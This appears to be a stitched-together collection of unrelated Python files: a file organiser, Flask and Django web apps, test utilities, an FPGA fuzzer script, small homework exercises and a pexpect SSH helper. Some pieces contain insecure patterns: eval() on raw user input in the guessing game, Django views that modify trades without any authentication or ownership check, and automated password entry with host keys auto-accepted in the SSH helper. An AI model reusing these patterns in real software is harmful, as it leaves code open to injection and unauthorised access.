def get_new_destination(path, filename, destination):
if not check_file_exists(destination):
print('Destination: ' + destination)
return destination
counter = 1
print('File exists on the destination folder, giving it a new name')
while True:
counter = counter + 1
new_destination = get_file_name(
destination) + ' (' + str(counter) + ')' + get_file_extension(destination)
if not check_file_exists(new_destination):
destination = new_destination
print('New name: ' + destination)
break
return destination
def destination(path, filename):
destination_folder = generic_folder_destination
if os.path.isfile(path):
extension = get_file_extension(filename)
if extension == '.download':
check_file_completed(filename)
return ''
if extension in image_extensions:
destination_folder = images_folder_destination
elif extension in video_extensions:
destination_folder = videos_folder_destination
elif extension in audio_extensions:
destination_folder = audios_folder_destination
elif extension in installer_extensions:
destination_folder = installers_folder_destination
elif extension in pdfs_extensions:
destination_folder = pdfs_folder_destination
return destination_folder + '/' + filename
def move_files():
files = os.listdir(folder_to_track)
# omit hidden files
filtered_files = [x for x in files if not x.startswith('.')]
for filename in filtered_files:
src = folder_to_track + '/' + filename
if not check_file_completed(src):
move_files()
break
new_destination = destination(src, filename)
new_destination = get_new_destination(src, filename, new_destination)
print(date_time() + ' Moving ' +
src + ' to ' + new_destination)
print_to_log(date_time() + ' Moving ' +
src + ' to ' + new_destination)
os.rename(src, new_destination)
class MyHandler(FileSystemEventHandler):
def on_modified(self, event):
move_files()
event_handler = MyHandler()
observer = Observer()
observer.schedule(event_handler, folder_to_track, recursive=True)
observer.start()
move_files()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
observer.stop()
observer.join()
|
import struct
def spliter(format, buffer):
data = buffer[:struct.calcsize(format)]
buffer = buffer[struct.calcsize(format):]
ret = struct.unpack(format, data)
if len(ret) == 1: ret = ret[0]
return ret, buffer |
from datetime import datetime
from flask import (
abort,
Blueprint,
jsonify,
request,
Response,
send_from_directory,
)
import config
from models import (
Comment,
db,
Post,
)
api = Blueprint('api', __name__, url_prefix="")
@api.route('/')
def home():
return "You are in my home page"
@api.route('/<filename>')
def serve_file(filename):
if filename == 'favicon.ico':
# We don't have a favicon, let's make sure the
# requests to see it are treated separately
abort(404)
if not filename:
abort(404)
return send_from_directory(config.UPLOAD_FOLDER, filename)
@api.route('/posts', methods=['GET', 'POST'])
def posts():
if request.method == 'GET':
return jsonify({
'posts': [post.to_dict(extended=True) for post in Post.query.order_by(Post.timestamp_creation.desc())]
})
# Taken from: https://flask.palletsprojects.com/en/1.1.x/patterns/fileuploads/
if 'file' not in request.files:
abort(Response("Missing file", 400))
file = request.files['file']
if file.filename == '':
abort(Response("Empty filename", 400))
filename = Post.add_file(file)
new_post = Post(timestamp_creation=datetime.now(), filename=filename)
db.session.add(new_post)
db.session.commit()
db.session.refresh(new_post) # To have the id of the newly created object
return jsonify(new_post.to_dict())
@api.route('/posts/<int:id_post>', methods=['PUT', 'DELETE'])
def posts_id(id_post):
post = Post.query.get_or_404(id_post)
if request.method == 'PUT':
if 'file' not in request.files:
abort(Response("Missing file", 400))
file = request.files['file']
if file.filename == '':
abort(Response("Empty filename", 400))
Post.delete_file(post.filename)
filename = Post.add_file(file)
post.filename = filename
db.session.commit()
db.session.refresh(post)
return jsonify(post.to_dict())
db.session.delete(post)
db.session.commit()
return ('', 200)
@api.route('/posts/<int:id_post>/comments', methods=['POST'])
def posts_id_comments(id_post):
# We could make it without this line, but this would assume that the post does exists
post = Post.query.get_or_404(id_post)
if not request.json:
abort(Response('Empty body', 400))
if not request.json.get('comment'):
abort(Response('Missing comment body', 400))
new_comment = Comment(comment=request.json.get('comment'), related_post=post.id, timestamp_creation=datetime.now())
db.session.add(new_comment)
db.session.commit()
db.session.refresh(new_comment) # To have the id of the newly created object
return jsonify(new_comment.to_dict())
@api.route('/comments/<int:id_comment>', methods=['PUT', 'DELETE'])
def comments_id(id_comment):
comment = Comment.query.get_or_404(id_comment)
if request.method == 'PUT':
comment.comment = request.json.get('comment', comment.comment)
db.session.commit()
db.session.refresh(comment)
return jsonify(comment.to_dict())
db.session.delete(comment)
db.session.commit()
return ('', 200)
|
import functools
import inspect
import os
from glob import glob
from random import shuffle
from types import GeneratorType
from typing import TextIO
from _pytest.python import Metafunc
from loguru import logger
from pytest_cleanup.common import (
get_class_that_defined_method,
mergeFunctionMetadata,
is_async_fn,
try_load_dill,
pytestcleanup_decorated_with_record_test_data,
get_name,
)
from pytest_cleanup.constants import test_data_directory
def deserialise(f):
return deserialise_json(f)
def deserialise_json(f: TextIO):
import jsonpickle
contents = f.read()
return jsonpickle.loads(contents)
def transform_function(f):
if getattr(f, pytestcleanup_decorated_with_record_test_data, False):
# raise Exception('Already decorated')
return f
clazz = get_class_that_defined_method(f)
arg_signature = inspect.getfullargspec(f).args
is_cls_function = clazz and arg_signature and arg_signature[0] == 'cls'
@functools.wraps(f)
def wrapper(*args, **kwargs):
if is_cls_function:
first_arg_is_cls = len(args) and not isinstance(list(args)[0], clazz) or not len(args)
if first_arg_is_cls:
args = remove_first_argument(args)
return_value = f(*args, **kwargs)
if isinstance(return_value, GeneratorType):
# generators aren't really comparable, so we compare lists instead
return list(return_value)
return return_value
def remove_first_argument(args):
return tuple(list(args)[1:])
wrapper.pytestcleanup_decorated_with_record_test_data = True
return wrapper
def deserialise_from_file(filename):
with open(filename, 'r') as f:
try:
return deserialise(f)
except Exception as e:
logger.error(f'Error loading data file {filename}')
logger.error(e)
def load_data_file(filename, is_async):
data = deserialise_from_file(filename)
if not data:
return
fn = data['function']
if (is_async and not is_async_fn(fn)) or (not is_async and is_async_fn(fn)):
return
if not fn:
logger.warning(f'Function was not properly loaded from {filename}')
return
module = data['module']
function_name = fn.__name__
clazz = data['class']
class_or_module = clazz or module
if not class_or_module:
# can happen if user loaded std lib modules
return
# raise Exception(f'no class or module found for {filename}')
fn = getattr(class_or_module, function_name)
new_item = mergeFunctionMetadata(fn, transform_function(fn))
return (
module,
clazz,
[
(new_item, try_load_dill(x['args']), try_load_dill(x['kwargs']), edit_return_value(x['return_value']))
for x in data['test_cases']
],
)
def edit_return_value(return_value):
from _collections_abc import list_iterator
return_value = try_load_dill(return_value)
if isinstance(return_value, list_iterator):
# because jsonpickle serialises things like generators as "list iterators"
return_value = list(return_value)
return return_value
def parametrize_stg_tests(metafunc: Metafunc):
if metafunc.definition.name == 'test_pytest_cleanup_async_test_cases':
_parametrize_stg_tests(metafunc, is_async=True)
if metafunc.definition.name == 'test_pytest_cleanup_sync_test_cases':
_parametrize_stg_tests(metafunc, is_async=False)
def _parametrize_stg_tests(metafunc: Metafunc, is_async):
sep = os.sep
path_list = list(sorted(glob(f'{test_data_directory}{sep}*{sep}**{sep}*.json', recursive=True)))
all_test_data = []
all_ids = []
for data_file_path in path_list:
split = data_file_path.split(sep)
function_name = split[-2]
try:
tuple_result = load_data_file(data_file_path, is_async)
if tuple_result:
module, clazz, test_cases = tuple_result
else:
continue
except Exception as e:
logger.error(f'Could not load data file {data_file_path}')
logger.error(e)
raise e
module_name = get_name(module)
class_name = get_name(clazz)
class_or_module_name = module_name if module_name != class_name else f'{module_name}.{class_name}'
ids = [f'{class_or_module_name}-{function_name}'] * len(test_cases)
all_test_data.extend(test_cases)
all_ids.extend(ids)
metafunc.parametrize(['fn', 'args', 'kwargs', 'expected'], all_test_data, ids=all_ids)
|
from django.urls import include
from django.conf.urls import url
from rest_framework import routers
from .views import UserViewSet
router = routers.DefaultRouter()
router.register(r"user", UserViewSet, basename='user')
urlpatterns = router.urls
|
from django.shortcuts import render, get_object_or_404
from .forms import EntryForm
from .models import Trades
from user.models import Profile
from django.http import HttpResponseRedirect, HttpResponse, JsonResponse
from django.views.generic.edit import UpdateView
import datetime
from django.urls import reverse
import csv
from django.contrib.auth.models import User
from django.contrib.auth.decorators import login_required
from django.db.models import F
import decimal
@login_required
def index(request):
form = EntryForm()
trades = Trades.objects.filter(user_id=request.user.id)
return render(request, 'trades/index.html', {'trades': trades, 'form': form})
def trades(request):
if request.method == 'GET':
form = EntryForm()
elif request.method == 'POST':
form = EntryForm(request.POST)
pnl = 0
success = False
if form.is_valid():
ticker = form.cleaned_data['ticker']
position = form.cleaned_data['position']
shares = form.cleaned_data['shares']
entry_date = form.cleaned_data['entry_date']
exit_date = form.cleaned_data['exit_date']
entry_price = form.cleaned_data['entry_price']
exit_price = form.cleaned_data['exit_price']
entry_comments = form.cleaned_data['entry_comments']
exit_comments = form.cleaned_data['exit_comments']
# Calculate PnL
if position == 'Long':
pnl = (float(exit_price) - float(entry_price)) * int(shares)
if exit_price >= entry_price:
success = True
elif position == 'Short':
pnl = (float(entry_price) - float(exit_price)) * int(shares)
if entry_price >= exit_price:
success = True
success = 'success' if success else 'fail'
Profile.objects.filter(user_id=request.user.id).update(account_balance=F("account_balance")+pnl)
account_balance = Profile.objects.get(user=request.user).account_balance
Trades.objects.create(
user_id=request.user.id,
ticker=ticker,
position=position,
shares=shares,
entry_date=entry_date,
exit_date=exit_date,
entry_price=entry_price,
exit_price=exit_price,
pnl=pnl,
entry_comments=entry_comments,
exit_comments=exit_comments,
success=success,
account_balance=account_balance
).save()
return HttpResponseRedirect(reverse("trades:index"))
return render(request, 'trades/form.html', {'form': form})
def delete_trade(request, pk):
if request.method == 'DELETE':
trade = get_object_or_404(Trades, pk=pk)
if trade.pnl >= 0:
trade.account_balance = decimal.Decimal(trade.account_balance) - decimal.Decimal(trade.pnl)
Profile.objects.filter(user=request.user).update(account_balance=trade.account_balance)
else:
trade.account_balance = decimal.Decimal(trade.account_balance) + decimal.Decimal(trade.pnl)
Profile.objects.filter(user=request.user).update(account_balance=trade.account_balance)
trade.delete()
return HttpResponse(status=200)
def update_trade(request):
if request.method == 'POST':
success = False
pk = request.POST.get('pk')
ticker = request.POST.get('ticker')
position = request.POST.get('position')
shares = request.POST.get('shares')
entry_date = datetime.datetime.strptime(request.POST.get('entry_date'), '%m/%d/%y').date()
exit_date = datetime.datetime.strptime(request.POST.get('exit_date'), '%m/%d/%y').date()
entry_price = request.POST.get('entry_price')
exit_price = request.POST.get('exit_price')
pnl = 0
entry_comments = request.POST.get('entry_comments')
exit_comments = request.POST.get('exit_comments')
# Calculate PnL
if position == 'Long':
pnl = (float(exit_price) - float(entry_price)) * int(shares)
if exit_price >= entry_price:
success = True
elif position == 'Short':
pnl = (float(entry_price) - float(exit_price)) * int(shares)
if entry_price >= exit_price:
success = True
success = 'success' if success else 'fail'
trade = Trades.objects.filter(pk=pk).update(
ticker=ticker,
position=position,
shares=shares,
entry_date=entry_date,
exit_date=exit_date,
entry_price=entry_price,
exit_price=exit_price,
pnl=pnl,
entry_comments=entry_comments,
exit_comments=exit_comments,
success=success
)
return HttpResponseRedirect(reverse("trades:index"))
def populate_update_form(request, pk):
data = Trades.objects.filter(pk=pk)
context = {'update_trades': data}
return JsonResponse(list(data.values()), safe=False)
def csv_write(request):
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment;filename=trades.csv'
writer = csv.writer(response)
trades = Trades.objects.filter(user_id=request.user.id)
writer.writerow(['Ticker', 'Position', 'Shares', 'Entry Date', 'Exit Date', 'Entry Price', 'Exit Price', 'PnL', 'Entry Comments', 'Exit Comments'])
for trade in trades:
writer.writerow([trade.ticker, trade.position, trade.shares, trade.entry_date, trade.exit_date, trade.entry_price, trade.exit_price, trade.pnl, trade.entry_comments, trade.exit_comments])
return response |
import os
from django.db import models
class Media(models.Model):
media_name = models.CharField(max_length=100)
media_url = models.FileField(upload_to='media/')
media_description = models.CharField(max_length=150, default="Napisz tu coś")
def extension(self):
name, extension = os.path.splitext(self.media_url.name)
return extension
def delete(self, using=None, keep_parents=False):
self.media_url.storage.delete(self.media_url.name)
super().delete(using, keep_parents)
def __str__(self):
return self.media_name
|
# Licensed to Modin Development Team under one or more contributor license agreements.
# See the NOTICE file distributed with this work for additional information regarding
# copyright ownership. The Modin Development Team licenses this file to you under the
# Apache License, Version 2.0 (the "License"); you may not use this file except in
# compliance with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under
# the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific language
# governing permissions and limitations under the License.
import pytest
import modin.pandas as pd
from modin.utils import try_cast_to_pandas
import pandas
from pandas.api.types import is_datetime64_any_dtype
import pyarrow as pa
from modin.pandas.test.utils import (
df_equals,
io_ops_bad_exc,
eval_io as general_eval_io,
)
from modin.experimental.core.execution.native.implementations.omnisci_on_native.omnisci_worker import (
OmnisciServer,
)
def eval_io(
fn_name,
comparator=df_equals,
cast_to_str=False,
check_exception_type=True,
raising_exceptions=io_ops_bad_exc,
check_kwargs_callable=True,
modin_warning=None,
md_extra_kwargs=None,
*args,
**kwargs,
):
"""
Evaluate I/O operation and do equality check after importing Modin's data to OmniSci.
Notes
-----
For parameters description please refer to ``modin.pandas.test.utils.eval_io``.
"""
def omnisci_comparator(df1, df2):
"""Evaluate equality comparison of the passed frames after importing the Modin's one to OmniSci."""
with ForceOmnisciImport(df1, df2):
# Aligning DateTime dtypes because of the bug related to the `parse_dates` parameter:
# https://github.com/modin-project/modin/issues/3485
df1, df2 = align_datetime_dtypes(df1, df2)
comparator(df1, df2)
general_eval_io(
fn_name,
comparator=omnisci_comparator,
cast_to_str=cast_to_str,
check_exception_type=check_exception_type,
raising_exceptions=raising_exceptions,
check_kwargs_callable=check_kwargs_callable,
modin_warning=modin_warning,
md_extra_kwargs=md_extra_kwargs,
*args,
**kwargs,
)
def align_datetime_dtypes(*dfs):
"""
Make all of the passed frames have DateTime dtype for the same columns.
Cast column type of the certain frame to the DateTime type if any frame in
the `dfs` sequence has DateTime type for this column.
Parameters
----------
*dfs : iterable of DataFrames
DataFrames to align DateTime dtypes.
Notes
-----
Passed Modin frames may be casted to pandas in the result.
"""
datetime_cols = {}
for df in dfs:
for col, dtype in df.dtypes.items():
# If we already decided to cast this column to DateTime no more actions are needed
if col not in datetime_cols and is_datetime64_any_dtype(dtype):
datetime_cols[col] = dtype
casted_dfs = (
# OmniSci has difficulties with casting to certain dtypes (i.e. datetime64),
# so casting it to pandas before doing 'astype'
tuple(try_cast_to_pandas(df).astype(datetime_cols) for df in dfs)
# This is required so we don't try to cast empty OmniSci frames to pandas:
# https://github.com/modin-project/modin/issues/3428
if len(datetime_cols)
else dfs
)
return casted_dfs
class ForceOmnisciImport:
"""
Trigger import execution for Modin DataFrames obtained by OmniSci engine if already not.
When using as a context class also cleans up imported tables at the end of the context.
Parameters
----------
*dfs : iterable
DataFrames to trigger import.
"""
def __init__(self, *dfs):
self._imported_frames = []
for df in dfs:
if not isinstance(df, (pd.DataFrame, pd.Series)):
continue
df.shape # to trigger real execution
if df.empty:
continue
partition = df._query_compiler._modin_frame._partitions[0][0]
if partition.frame_id is not None:
continue
frame = partition.get()
if isinstance(frame, (pandas.DataFrame, pandas.Series)):
frame_id = OmnisciServer().put_pandas_to_omnisci(frame)
elif isinstance(frame, pa.Table):
frame_id = OmnisciServer().put_arrow_to_omnisci(frame)
else:
raise TypeError(
f"Unexpected storage format, expected pandas.DataFrame or pyarrow.Table, got: {type(frame)}."
)
partition.frame_id = frame_id
self._imported_frames.append((df, frame_id))
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
for df, frame_id in self._imported_frames:
actual_frame_id = df._query_compiler._modin_frame._partitions[0][0].frame_id
OmnisciServer().executeDDL(f"DROP TABLE IF EXISTS {frame_id}")
if actual_frame_id == frame_id:
df._query_compiler._modin_frame._partitions[0][0].frame_id = None
self._imported_frames = []
def set_execution_mode(frame, mode, recursive=False):
"""
Enable execution mode assertions for the passed frame.
Enabled execution mode checks mean, that the frame raises an AssertionError
if the execution flow is out of the scope of the selected mode.
Parameters
----------
frame : DataFrame or Series
Modin frame to set execution mode at.
mode : {None, "lazy", "arrow"}
Execution mode to set:
- "lazy": only delayed computations.
- "arrow": only computations via Pyarrow.
- None: allow any type of computations.
recursive : bool, default: False
Whether to set the specified execution mode for every frame
in the delayed computation tree.
"""
if isinstance(frame, (pd.Series, pd.DataFrame)):
frame = frame._query_compiler._modin_frame
frame._force_execution_mode = mode
if recursive and hasattr(frame._op, "input"):
for child in frame._op.input:
set_execution_mode(child, mode, True)
def run_and_compare(
fn,
data,
data2=None,
force_lazy=True,
force_arrow_execute=False,
allow_subqueries=False,
comparator=df_equals,
**kwargs,
):
"""Verify equality of the results of the passed function executed against pandas and modin frame."""
def run_modin(
fn,
data,
data2,
force_lazy,
force_arrow_execute,
allow_subqueries,
constructor_kwargs,
**kwargs,
):
kwargs["df1"] = pd.DataFrame(data, **constructor_kwargs)
kwargs["df2"] = pd.DataFrame(data2, **constructor_kwargs)
kwargs["df"] = kwargs["df1"]
if force_lazy:
set_execution_mode(kwargs["df1"], "lazy")
set_execution_mode(kwargs["df2"], "lazy")
elif force_arrow_execute:
set_execution_mode(kwargs["df1"], "arrow")
set_execution_mode(kwargs["df2"], "arrow")
exp_res = fn(lib=pd, **kwargs)
if force_arrow_execute:
set_execution_mode(exp_res, "arrow", allow_subqueries)
elif force_lazy:
set_execution_mode(exp_res, None, allow_subqueries)
return exp_res
constructor_kwargs = kwargs.pop("constructor_kwargs", {})
try:
kwargs["df1"] = pandas.DataFrame(data, **constructor_kwargs)
kwargs["df2"] = pandas.DataFrame(data2, **constructor_kwargs)
kwargs["df"] = kwargs["df1"]
ref_res = fn(lib=pandas, **kwargs)
except Exception as e:
with pytest.raises(type(e)):
exp_res = run_modin(
fn=fn,
data=data,
data2=data2,
force_lazy=force_lazy,
force_arrow_execute=force_arrow_execute,
allow_subqueries=allow_subqueries,
constructor_kwargs=constructor_kwargs,
**kwargs,
)
_ = exp_res.index
else:
exp_res = run_modin(
fn=fn,
data=data,
data2=data2,
force_lazy=force_lazy,
force_arrow_execute=force_arrow_execute,
allow_subqueries=allow_subqueries,
constructor_kwargs=constructor_kwargs,
**kwargs,
)
comparator(ref_res, exp_res)
|
from django import forms
from .models import ProductoImagen
class ProductoImagenForm(forms.ModelForm):
class Meta:
model = ProductoImagen
fields = ['producto', 'nombre','descripcion', 'imagen']
|
def on_init(t):
# DO ON INITIALIZATION STUFF HERE
return True
def on_commit(t):
# GLOBAL ON COMMIT ie every solution
# http://docs.gridlabd.us/_page.html?owner=slacgismo&project=gridlabd&branch=develop&folder=/Module&doc=/Module/Python.md
print("Time: ", t)
power_val_A = gridlabd.get_value("load_1","constant_power_A")
if t>1608973200 :
gridlabd.set_value("load_1","constant_power_B", "30")
print("Power drawn on phase A load 1", power_val_A)
power_val_B = gridlabd.get_value("load_1","constant_power_B")
print("Power drawn on phase B load 1", power_val_B)
return True
|
from selenium import webdriver
from Utils.folder_structure_builder import FolderStructureBuilder
class Helpers:
@classmethod
def take_screenshot(cls, browser, filename):
location = f'{FolderStructureBuilder.failed_screenshot_folder}/{filename}.png'
browser.get_screenshot_as_file(location)
|
#!/usr/bin/env python3
import sys, re, os
sys.path.append("../../../utils/")
from segmaker import segmaker
segmk = segmaker("design.bits")
# Can fit 4 per CLB
# BELable
multi_bels_by = [
'SRL16E',
'SRLC32E',
]
# Not BELable
multi_bels_bn = [
'RAM32X1S',
'RAM64X1S',
]
# Those requiring special resources
# Just make one per module
greedy_modules = [
'my_RAM128X1D',
'my_RAM128X1S',
'my_RAM256X1S',
]
print("Loading tags")
'''
module,loc,bela,belb,belc,beld
my_ram_N,SLICE_X12Y100,SRLC32E,SRL16E,SRLC32E,LUT6
my_ram_N,SLICE_X12Y101,SRLC32E,SRLC32E,SRLC32E,SRLC32E
my_RAM256X1S,SLICE_X12Y102,None,0,,
'''
f = open('params.csv', 'r')
f.readline()
for l in f:
l = l.strip()
module, loc, p0, p1, p2, p3 = l.split(',')
segmk.addtag(
loc, "WA7USED",
module in ('my_RAM128X1D', 'my_RAM128X1S', 'my_RAM256X1S'))
segmk.addtag(loc, "WA8USED", module == 'my_RAM256X1S')
# (a, b, c, d)
# Size set for RAM32X1S, RAM32X1D, and SRL16E
size = [0, 0, 0, 0]
# SRL set for SRL* primitives
srl = [0, 0, 0, 0]
# RAM set for RAM* primitives
ram = [0, 0, 0, 0]
if module == 'my_ram_N':
# Each one of: SRL16E, SRLC32E, LUT6
bels = [p0, p1, p2, p3]
# Clock Enable (CE) clock gate only enabled if we have clocked elements
# A pure LUT6 does not, but everything else should
segmk.addtag(loc, "WEMUX.CE", bels != ['LUT6', 'LUT6', 'LUT6', 'LUT6'])
beli = 0
for which, bel in zip('ABCD', bels):
if bel == 'SRL16E':
size[beli] = 1
if bel in ('SRL16E', 'SRLC32E'):
srl[beli] = 1
beli += 1
else:
n = p0
if n:
n = int(n)
# Unused. Just to un-alias mux
#_ff = int(p1)
# Can pack 4 into a CLB
# D is always occupied first (due to WA/A sharing on D)
# TODO: maybe investigate ROM primitive for completeness
pack4 = [
# (a, b, c, d)
(0, 0, 0, 1),
(1, 0, 0, 1),
(1, 1, 0, 1),
(1, 1, 1, 1),
]
# Uses CD first
pack2 = [
(0, 0, 1, 1),
(1, 1, 1, 1),
]
# Always use all 4 sites
if module in ('my_RAM32M', 'my_RAM64M', 'my_RAM128X1D',
'my_RAM256X1S'):
ram = [1, 1, 1, 1]
# Only can occupy CD I guess
elif module == 'my_RAM32X1D':
ram = [0, 0, 1, 1]
# Uses 2 sites at a time
elif module in ('my_RAM64X1D_N', 'my_RAM128X1S_N'):
ram = pack2[n - 1]
# Uses 1 site at a time
elif module in ('my_RAM32X1S_N', 'my_RAM64X1S_N'):
ram = pack4[n - 1]
else:
assert (0)
# All entries here requiare D
assert (ram[3])
if module == 'my_RAM32X1D':
# Occupies CD
size[2] = 1
size[3] = 1
elif module == 'my_RAM32M':
size = [1, 1, 1, 1]
elif module == 'my_RAM32X1S_N':
size = pack4[n - 1]
else:
assert (not module.startswith('my_RAM32'))
# Now commit bits after marking 1's
for beli, bel in enumerate('ABCD'):
segmk.addtag(loc, "%sLUT.RAM" % bel, ram[beli])
segmk.addtag(loc, "%sLUT.SRL" % bel, srl[beli])
# FIXME
module == segmk.addtag(loc, "%sLUT.SMALL" % bel, size[beli])
def bitfilter(frame_idx, bit_idx):
# Hack to remove aliased PIP bits on CE
# We should either mix up routing more or exclude previous DB entries
assert os.getenv("XRAY_DATABASE") == "artix7"
return (frame_idx, bit_idx) not in [(0, 27), (1, 25), (1, 26), (1, 29)]
segmk.compile(bitfilter=bitfilter)
segmk.write()
|
#random module 불러오기
import random
#1~100 사이 임의의 정수를 불러와 answer에 지정
answer = random.randint(1,100)
print(answer)
# 사용자로부터 이름과 답 입력받기
username = input("What is your name? ")
guess = eval(input("Hi, " + username + " guess the number: "))
# if 조건문을 활용해 정답 판단하기
if guess == answer:
print("Correct! Answer was " + str(answer))
else:
print("You are wrong!!")
|
#!/usr/bin/env python
# coding: utf-8
# In[ ]:
---HOMEWORK 3----
#Name: Ayşegül
#Surname: Hülagü
#mail: hulaguaysegul@gmail.com
# In[123]:
def prime_numbers(lower,upper):
for i in range(lower,upper+1):
for num in range(2,i):
if(i%num)==0:
break
else:
print (i)
# In[124]:
prime_numbers(2,100)
|
import os
import pytest
import ucp.exceptions
from ucp._libs import ucx_api
from ucp._libs.arr import Array
def test_get_config():
ctx = ucx_api.UCXContext()
config = ctx.get_config()
assert isinstance(config, dict)
assert config["MEMTYPE_CACHE"] == "n"
def test_set_env():
os.environ["UCX_SEG_SIZE"] = "2M"
ctx = ucx_api.UCXContext()
config = ctx.get_config()
assert config["SEG_SIZE"] == os.environ["UCX_SEG_SIZE"]
def test_init_options():
os.environ["UCX_SEG_SIZE"] = "2M" # Should be ignored
options = {"SEG_SIZE": "3M"}
ctx = ucx_api.UCXContext(options)
config = ctx.get_config()
assert config["SEG_SIZE"] == options["SEG_SIZE"]
def test_init_unknown_option():
options = {"UNKNOWN_OPTION": "3M"}
with pytest.raises(ucp.exceptions.UCXConfigError):
ucx_api.UCXContext(options)
def test_init_invalid_option():
options = {"SEG_SIZE": "invalid-size"}
with pytest.raises(ucp.exceptions.UCXConfigError):
ucx_api.UCXContext(options)
@pytest.mark.parametrize("feature_flag", [ucx_api.Feature.TAG, ucx_api.Feature.STREAM])
def test_feature_flags_mismatch(feature_flag):
ctx = ucx_api.UCXContext(feature_flags=(feature_flag,))
worker = ucx_api.UCXWorker(ctx)
addr = worker.get_address()
ep = worker.ep_create_from_worker_address(addr, endpoint_error_handling=False)
msg = Array(bytearray(10))
if feature_flag == ucx_api.Feature.STREAM:
with pytest.raises(
ValueError, match="UCXContext must be created with `Feature.TAG`"
):
ucx_api.tag_send_nb(ep, msg, msg.nbytes, 0, None)
with pytest.raises(
ValueError, match="UCXContext must be created with `Feature.TAG`"
):
ucx_api.tag_recv_nb(worker, msg, msg.nbytes, 0, None)
elif feature_flag == ucx_api.Feature.TAG:
with pytest.raises(
ValueError, match="UCXContext must be created with `Feature.STREAM`"
):
ucx_api.stream_send_nb(ep, msg, msg.nbytes, None)
with pytest.raises(
ValueError, match="UCXContext must be created with `Feature.STREAM`"
):
ucx_api.stream_recv_nb(ep, msg, msg.nbytes, None)
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# remote_ssh.py
import pexpect
def remote_ssh(ip, password, cmd, username='root'):
ssh = pexpect.spawn('ssh ' + username + '@' + ip + ' ' + cmd, timeout=None)
try:
i = ssh.expect(['password:', 'yes/no'], timeout=5)
if i == 0:
ssh.sendline(password)
elif i == 1:
ssh.sendline('yes')
ssh.expect('password:', timeout=5)
ssh.sendline(password)
except pexpect.EOF:
print("EOF")
except pexpect.TIMEOUT:
print("TIMEOUT")
exitcode = ssh.exitstatus
r = ssh.read().decode()
ssh.close()
return exitcode, r
|
import csv
import textwrap
from datetime import datetime
from typing import Optional
import pyomo.environ as pyo
import yaml
from pysperf import _JobResult
from pysperf.config import outputdir, time_format
from pysperf.model_library import models
from pysperf.solver_library import solvers
from pysperf.paver_utils.julian import get_julian_datetime
from pysperf.paver_utils.parse_to_gams import solver_status_to_gams, termination_condition_to_gams_format
from pysperf.run_manager import _load_run_config, get_run_dir, this_run_config
def create_solu_file() -> None:
"""
Creates the pysperf_models.solu file based on optimal and best-solution-known information for each model.
"""
with outputdir.joinpath("pysperf_models.solu").open('w') as solufile:
for test_model in models.values():
if test_model.opt_value is not None:
soln_type, soln_value = "=opt=", test_model.opt_value
else:
soln_type, soln_value = "=best=", test_model.best_value
print(f"{soln_type}\t{test_model.name}\t{soln_value}", file=solufile)
def create_paver_tracefile(run_number: Optional[int] = None):
this_run_dir = get_run_dir(run_number)
_load_run_config(this_run_dir)
# Create trace file
trace_header = """\
* Trace Record Definition
* GamsSolve
* InputFileName,SolverName,OptionFile,Direction,NumberOfEquations,NumberOfVariables,NumberOfDiscreteVariables,NumberOfNonZeros,NumberOfNonlinearNonZeros,
* ModelStatus,SolverStatus,ObjectiveValue,ObjectiveValueEstimate,SolverTime,ETSolver,NumberOfIterations,NumberOfNodes
"""
trace_data = []
for model_name, solver_name in this_run_config.jobs_run - this_run_config.jobs_failed:
with this_run_dir.joinpath(solver_name, model_name, "pysperf_result.log").open('r') as resultfile:
job_result = _JobResult(**yaml.safe_load(resultfile))
_validate_job_result(job_result)
test_model = models[model_name]
test_solver = solvers[solver_name]
trace_line = [
model_name, # Model Name
'MINLP', # LP, MIP, NLP, etc.
solver_name, # ...
test_solver.nlp, # default NLP solver
test_solver.milp, # default MIP solver
get_julian_datetime(datetime.strptime(
job_result.model_build_start_time, time_format)), # start day/time of job
0 if test_model.objective_sense == "minimize" else 1, # direction 0=min, 1=max
test_model.constraints, # total number of equations
test_model.variables, # total number of variables
test_model.binary_variables + test_model.integer_variables, # total number of discrete variables
'nznum?', # number of nonzeros
'nlz?', # number of nonlinear nonzeros
0, # 1= optfile included
termination_condition_to_gams_format(job_result.termination_condition),
# GAMS model return status - see the GAMS return codes section.
solver_status_to_gams(pyo.SolverStatus.ok), # GAMS solver return status - see the GAMS return codes section.
job_result.UB, # value of objective function
job_result.UB, # objective function estimate # TODO I think this only works for minimize?
job_result.solver_run_time, # resource time used (sec)
job_result.iterations, # number of solver iterations
0, # dom used
0, # nodes used
'# automatically generated by pysperf'
]
trace_data.append(trace_line)
with outputdir.joinpath("results.trc").open('w') as tracefile:
tracefile.write(textwrap.dedent(trace_header))
tracefile.write('*\n')
csvwriter = csv.writer(tracefile)
csvwriter.writerows(trace_data)
def _validate_job_result(job_result: _JobResult):
if job_result.termination_condition is None:
job_result.termination_condition = pyo.TerminationCondition.unknown
elif type(job_result.termination_condition) == str:
job_result.termination_condition = pyo.TerminationCondition(job_result.termination_condition)
|
import spacy
nlp = spacy.load('en_core_web_sm')
from spacy import displacy
doc = nlp("Over the last quarter, Apple sold nearly twenty thousand iPods for a profit of $6 million." "By contrast, Sony only sold 8000 Walkman music players.")
#doc = displacy.render(doc, style = 'ent', jupyter = True)
for sentence in doc.sents:
displacy.render(sentence, jupyter = True, style = 'ent')
options = {'ents': ['PRODUCT', 'ORG']}
displacy.render(doc, style = 'ent', jupyter = True, options = options, )
colors = {'ORG': 'red', 'PRODUCT': 'blue'}
options = {'ents': ['PRODUCT', 'ORG'], 'colors': colors}
displacy.render(doc, style = 'ent', jupyter = True, options = options)
colors = {'ORG': 'radial-gradient(yellow, green)' }
options = {'ents': ['PRODUCT', 'ORG'], 'colors': colors}
displacy.render(doc, style = 'ent', jupyter = True, options = options)
colors = {'ORG': 'linear-gradient(green, yellow)' }
options = {'ents': ['PRODUCT', 'ORG'], 'colors': colors}
displacy.render(doc, style = 'ent', jupyter = True, options = options)
displacy.serve(doc, style = 'ent', options = options)
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
